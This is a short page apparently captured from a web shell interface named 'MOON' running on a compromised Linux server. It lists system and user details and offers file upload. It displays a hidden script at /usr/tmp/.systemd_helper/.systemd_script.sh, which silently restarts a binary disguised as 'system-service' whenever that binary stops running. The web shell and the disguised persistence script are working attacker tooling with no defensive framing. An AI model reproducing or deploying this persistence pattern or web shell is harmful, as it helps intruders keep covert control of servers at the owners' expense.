MOON
Server: Apache
System: Linux vmi433716.contaboserver.net 3.10.0-1160.144.1.el7.tuxcare.els4.x86_64 #1 SMP Tue Apr 7 08:40:40 UTC 2026 x86_64
User: affpashacom (1022)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //usr/tmp/.systemd_helper/.systemd_script.sh
#!/bin/bash
PROGRAM_PATH="/root/.local/bin/system-service"
# Check if the program is running
if ! pgrep -x "system-service" > /dev/null; then
	chmod +x /root/.local/bin/system-service
	(nice /root/.local/bin/system-service >/dev/null 2>&1 &)
fi